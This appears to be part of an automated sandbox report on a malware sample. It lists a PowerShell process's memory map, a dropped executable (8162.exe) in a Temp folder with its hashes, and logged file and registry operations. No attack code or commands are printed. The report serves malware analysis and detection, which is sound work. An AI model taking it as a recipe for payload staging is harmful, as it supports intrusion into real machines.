private_0x00000000025d0000 0x025d0000 0x0260ffff Private Memory Readable, Writable True False False
private_0x0000000002630000 0x02630000 0x0266ffff Private Memory Readable, Writable True False False
private_0x0000000002690000 0x02690000 0x026cffff Private Memory Readable, Writable True False False
sortkey.nlp 0x026d0000 0x02710fff Memory Mapped File Readable False False False
private_0x0000000002720000 0x02720000 0x0275ffff Private Memory Readable, Writable True False False
system.transactions.dll 0x02760000 0x027a2fff Memory Mapped File Readable, Writable, Executable False False False
private_0x00000000027c0000 0x027c0000 0x027fffff Private Memory Readable, Writable True False False
private_0x0000000002810000 0x02810000 0x0284ffff Private Memory Readable, Writable True False False
private_0x0000000002850000 0x02850000 0x028effff Private Memory Readable, Writable True False False
private_0x0000000002920000 0x02920000 0x0295ffff Private Memory Readable, Writable, Executable True False False
private_0x0000000002a00000 0x02a00000 0x02a3ffff Private Memory Readable, Writable True False False
private_0x0000000002a40000 0x02a40000 0x02a4ffff Private Memory Readable, Writable True False False
private_0x0000000002a50000 0x02a50000 0x04a4ffff Private Memory Readable, Writable True False False
private_0x0000000004ac0000 0x04ac0000 0x04afffff Private Memory Readable, Writable True False False
system.management.automation.dll 0x04b00000 0x04de1fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll.mui 0x04df0000 0x04eaffff Memory Mapped File Readable, Writable False False False
powershell.exe 0x22160000 0x221d1fff Memory Mapped File Readable, Writable, Executable False False False
culture.dll 0x60340000 0x60347fff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.security.ni.dll 0x642c0000 0x642ecfff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.commands.management.ni.dll 0x642f0000 0x643b2fff Memory Mapped File Readable, Writable, Executable True False False
system.transactions.ni.dll 0x64560000 0x645fbfff Memory Mapped File Readable, Writable, Executable True False False
microsoft.wsman.management.ni.dll 0x64600000 0x64684fff Memory Mapped File Readable, Writable, Executable True False False
system.configuration.install.ni.dll 0x64690000 0x646b4fff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.commands.diagnostics.ni.dll 0x646c0000 0x6470afff Memory Mapped File Readable, Writable, Executable True False False
system.core.ni.dll 0x64710000 0x64944fff Memory Mapped File Readable, Writable, Executable True False False
system.management.automation.ni.dll 0x64950000 0x651c9fff Memory Mapped File Readable, Writable, Executable True False False
system.management.automation.dll 0x651d0000 0x654b1fff Memory Mapped File Readable, Writable, Executable False False False
microsoft.powershell.consolehost.ni.dll 0x654c0000 0x65540fff Memory Mapped File Readable, Writable, Executable True False False
system.ni.dll 0x65550000 0x65cebfff Memory Mapped File Readable, Writable, Executable True False False
mscorlib.ni.dll 0x65cf0000 0x667e7fff Memory Mapped File Readable, Writable, Executable True False False
msvcr80.dll 0x66870000 0x6690afff Memory Mapped File Readable, Writable, Executable False False False
mscorwks.dll 0x66950000 0x66efafff Memory Mapped File Readable, Writable, Executable True False False
shdocvw.dll 0x66ed0000 0x66efdfff Memory Mapped File Readable, Writable, Executable False False False
cscapi.dll 0x67370000 0x6737afff Memory Mapped File Readable, Writable, Executable False False False
srvcli.dll 0x67380000 0x67398fff Memory Mapped File Readable, Writable, Executable False False False
ntshrui.dll 0x673a0000 0x6740ffff Memory Mapped File Readable, Writable, Executable False False False
system.transactions.dll 0x67aa0000 0x67ae2fff Memory Mapped File Readable, Writable, Executable False False False
apphelp.dll 0x68220000 0x6826bfff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x68d70000 0x68d90fff Memory Mapped File Readable, Writable, Executable False False False
propsys.dll 0x68da0000 0x68e94fff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x68f60000 0x68f9afff Memory Mapped File Readable, Writable, Executable False False False
mscoreei.dll 0x691b0000 0x69229fff Memory Mapped File Readable, Writable, Executable True False False
cryptsp.dll 0x73600000 0x73615fff Memory Mapped File Readable, Writable, Executable False False False
mscoree.dll 0x73620000 0x73669fff Memory Mapped File Readable, Writable, Executable True False False
profapi.dll 0x73ab0000 0x73abafff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x73ac0000 0x73ad6fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x73c20000 0x73dbdfff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x73f80000 0x73f87fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x73f90000 0x73febfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x73ff0000 0x7402efff Memory Mapped File Readable, Writable, Executable False False False
slc.dll 0x74590000 0x74599fff Memory Mapped File Readable, Writable, Executable False False False
atl.dll 0x74cd0000 0x74ce3fff Memory Mapped File Readable, Writable, Executable False False False
linkinfo.dll 0x74d80000 0x74d88fff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x750d0000 0x750d8fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x75310000 0x7538ffff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x753a0000 0x753abfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x753b0000 0x7540ffff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x75420000 0x754a2fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x75630000 0x7568ffff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x756a0000 0x756b1fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x756c0000 0x757cffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x757d0000 0x757e8fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75800000 0x75845fff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x75850000 0x75894fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x758a0000 0x758a4fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x758b0000 0x75a4cfff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75a50000 0x75adffff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75c60000 0x75d5ffff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x75d60000 0x75d86fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x75df0000 0x75e7efff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75e80000 0x75f6ffff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x761a0000 0x761f6fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x76200000 0x7635bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x76360000 0x76fa9fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76fb0000 0x7707bfff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x77140000 0x771ebfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x77310000 0x773acfff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x773b0000 0x7744ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000077450000 0x77450000 0x7756efff Private Memory Readable, Writable, Executable True False False
private_0x0000000077570000 0x77570000 0x77669fff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77670000 0x77818fff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x77820000 0x77829fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77850000 0x779cffff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
For performance reasons, the remaining 106 entries are omitted.
The remaining entries can be found in flog.txt.
Modified Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\hjrd1koky ds8lujv\appdata\local\temp\8162.exe 271.50 KB (278016 bytes) MD5: 4a9bf49040bccb972dc64a0976039de2
SHA1: 6d67e6b649505a5fc58145c89d066e8e716fddca
SHA256: 2b7f82d1063d449f64f0ca84e5bf90a895c42154d715aabae0ca06043f238234
False
Host Behavior
File (220)
+
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 2
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 2
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 6
Fn
Create C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info False 2
Fn
Get Info False 3
Fn
Get Info False 2
Fn
Get Info False 2
Fn
Get Info False 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml False 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml False 2
Fn
Get Info False 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml False 2
Fn
Get Info False 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml False 2
Fn
Get Info False 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml False 2
Fn
Get Info False 1
Fn
Get Info False 5
Fn
Get Info False 4
Fn
Get Info False 8
Fn
Get Info False 2
Fn
Get Info False 1
Fn
Get Info False 1
Fn
Get Info False 1
Fn
Get Info False 1
Fn
Get Info False 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config False 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size_out = 0 False 1
Fn
Get Info False 2
Fn
Get Info False 6
Fn
Get Info C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe False 2
Fn
Open STD_INPUT_HANDLE True 1
Fn
Open STD_OUTPUT_HANDLE True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 4096 True 17
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 3022 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 50, size_out = 0 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 281 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 4096 True 62
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 3895 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 201, size_out = 0 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Data
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 4096 True 1
Fn
Data
Write size = 207 True 1
Fn
Data
Write CONOUT$ size = 291 True 1
Fn
Data
Write CONOUT$ size = 1 True 1
Fn
Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 4096 True 11
Fn
Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 6708 True 1
Fn
Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 8972 True 1
Fn
Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 11876 True 1
Fn
Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 13328 True 1
Fn
Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 4356 True 2
Fn
Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 18876 True 1
Fn
Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 24944 True 1
Fn
Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 8712 True 1
Fn
Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 6068 True 1
Fn
Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 40656 True 1
Fn
Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 27848 True 1
Fn
Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 24684 True 1
Fn
Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 27588 True 1
Fn
Data
Write C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe size = 3988 True 1
Fn
Data
Registry (209)
+
Operation Key Additional Information Success Count Logfile
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1
Fn
Open Key HKEY_CURRENT_USER\Environment True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 6
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 3
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1
Fn
Open Key HKEY_CURRENT_USER True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1
Fn
